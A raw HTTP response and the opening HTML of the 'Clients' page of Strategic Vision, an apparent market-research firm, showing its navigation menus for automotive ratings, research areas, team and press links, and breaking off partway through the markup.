Set-Cookie: PHPSESSID=nijsk2230c9jq8i5d39hc8j9c0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Clients</title><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class=&q